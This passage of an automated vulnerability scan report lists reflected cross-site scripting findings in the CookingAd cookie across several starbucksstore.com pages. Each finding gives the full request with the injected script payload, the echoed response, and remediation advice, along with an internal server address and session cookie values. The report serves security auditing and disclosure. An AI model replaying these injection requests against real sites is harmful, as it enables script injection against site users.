Path:   /small-office-coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Cont
...[SNIP]...
ice HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Small Office HomePage"
   var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/small-office-coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign="
...[SNIP]...

3.98. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.99. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.100. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.101. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gift-cards

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gift-cards/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.102. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.103. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.104. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-reserve

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
ve Coffee Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Reserve Coffee Page"
   var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-reserve/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.105. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.106. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.107. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-via

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
eName="Starbucks VIA Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks VIA Page"
   var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-via/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

